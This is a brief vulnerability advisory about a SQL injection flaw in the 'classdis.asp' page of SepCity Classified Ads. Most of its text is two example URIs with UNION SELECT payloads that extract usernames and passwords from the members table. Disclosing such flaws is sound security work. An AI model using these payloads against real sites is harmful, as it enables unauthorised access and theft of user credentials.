SepCity Classified Ads 'classdis.asp' SQL Injection Vulnerability

SepCity Classified Ads 'classdis.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

www.example.com/[path]/classdis.asp?ID=1%20union%20select%200,1,username,3%20from%20members
www.example.com/[path]/classdis.asp?ID=1%20union%20select%200,1,password,3%20from%20members